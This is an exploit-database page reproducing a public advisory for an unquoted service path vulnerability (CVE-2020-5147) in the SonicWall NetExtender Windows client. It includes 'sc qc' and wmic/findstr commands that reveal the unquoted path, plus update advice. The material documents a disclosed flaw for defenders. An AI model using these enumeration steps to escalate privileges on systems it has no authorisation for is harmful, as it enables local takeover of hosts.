header-logo
Suggest Exploit
vendor:
NetExtender
by:
shinnai
5,3
CVSS
MEDIUM
Unquoted Service Path
426
CWE
Product Name: NetExtender
Affected Version From: 10.2.0.300
Affected Version To: 10.2.0.300
Patch Exists: Yes
Related CWE: CVE-2020-5147
CPE: a:sonicwall:netextender:10.2.0.300
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=155351https://www.infosecmatter.com/nessus-plugin-library/?id=141100https://www.infosecmatter.com/nessus-plugin-library/?id=101974https://www.infosecmatter.com/nessus-plugin-library/?id=127480https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/sixapart_movabletype_storable_exec
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

SonicWall NetExtender windows client unquoted service path vulnerability

SonicWall NetExtender Windows client vulnerable to unquoted service path vulnerability, this allows a local attacker to gain elevated privileges in the host operating system. This vulnerability impact SonicWall NetExtender Windows client version 10.2.300 and earlier.

Mitigation:

Update to the latest version of SonicWall NetExtender Windows client.
Source

Exploit-DB raw data:

# Exploit Title: SonicWall NetExtender 10.2.0.300 -  Unquoted Service Path
# Exploit Author: shinnai
# Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
# Version: 10.2.0.300
# Tested On: Windows
# CVE: CVE-2020-5147

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Title: SonicWall NetExtender windows client unquoted service path 
vulnerability
Vers.: 10.2.0.300
Down.: https://www.sonicwall.com/products/remote-access/vpn-clients/

Advisory: 
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2020-0023
CVE ID: CVE-2020-5147 (https://nvd.nist.gov/vuln/detail/CVE-2020-5147)

URLs:
https://besteffortteam.it/sonicwall-netextender-windows-client-unquoted-service-path-vulnerability/
https://shinnai.altervista.org/exploits/SH-029-20210109.html

Desc.:
SonicWall NetExtender Windows client vulnerable to unquoted service path 
vulnerability, this allows a local attacker to gain elevated privileges 
in the host operating system.
This vulnerability impact SonicWall NetExtender Windows client version 
10.2.300 and earlier.

Poc:

C:\>sc qc sonicwall_client_protection_svc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: sonicwall_client_protection_svc
         TIPO                      : 10  WIN32_OWN_PROCESS
         TIPO_AVVIO                : 2   AUTO_START
         CONTROLLO_ERRORE          : 1   NORMAL
         NOME_PERCORSO_BINARIO     : C:\Program Files\SonicWall\Client 
Protection Service\SonicWallClientProtectionService.exe <-- Unquoted 
Service Path Vulnerability
         GRUPPO_ORDINE_CARICAMENTO :
         TAG                       : 0
         NOME_VISUALIZZATO         : SonicWall Client Protection Service
         DIPENDENZE                :
         SERVICE_START_NAME : LocalSystem
C:\>

----------------------------------------------------------------------------------------------------------------------------------------------------------------------

C:\>wmic service get name,displayname,pathname,startmode |findstr /i 
"auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
SonicWall Client Protection Service                              
sonicwall_client_protection_svc  C:\Program Files\SonicWall\Client 
Protection Service\SonicWallClientProtectionService.exe      Auto

C:\>
----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR